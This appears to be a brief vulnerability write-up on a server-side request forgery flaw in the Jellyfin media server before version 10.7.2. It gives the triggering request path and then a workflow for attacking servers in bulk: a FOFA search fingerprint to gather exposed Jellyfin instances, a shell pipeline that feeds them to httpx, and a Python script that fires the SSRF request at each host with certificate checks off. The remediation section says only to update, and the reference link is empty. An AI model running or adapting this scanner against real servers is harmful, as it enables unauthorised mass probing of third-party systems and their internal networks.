1. Vulnerability Introduction#
Jellyfin is a free software media system that allows you to control media management and streaming. It is an alternative to proprietary Emby and Plex, providing media from a dedicated server to end-user devices through multiple applications. Jellyfin is the descendant of Emby 3.5.2 version, ported to the .NET Core framework to support full cross-platform support. Without any additional conditions, it is just a team wanting to build something better and working together to achieve it, committed to making the best media system accessible to all users.
There is an SSRF vulnerability in the Jellyfin RemoteImageController.cs file, which can be exploited to probe internal network information by constructing special requests.
2. Affected Versions#
Jellyfin < 10.7.2
3. Vulnerability Reproduction#
/Images/Remote?imageUrl=http://www.baidu.com
The fingerprint of the fofa search engine is: "Jellyfin" && port="8096", using the Fofa Collection Tool.exe to collect assets in bulk.
The collected asset results will be saved to a result.csv file in the same directory.
Filter IP or domain names using shell commands.
cat result.csv | awk -F "," '{print $2}' | httpx >> Jellyfin.txt
Then use a Python script for batch verification.
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def Jellyfin():
with open("Jellyfin.txt") as file:
for line in file:
vuln_url = line + "/Images/Remote?imageUrl=http://www.baidu.com"
try:
response = requests.get(url=vuln_url, verify=False, timeout=10)
if response.status_code == 200:
print(vuln_url)
else:
pass
continue
except Exception as e:
pass
#print(e)
continue
def main():
Jellyfin()
if __name__ == '__main__':
main()
4. Vulnerability Fix#
Update the version.
5. Reference Links#
For information about SSRF vulnerabilities, you can refer to this blog post: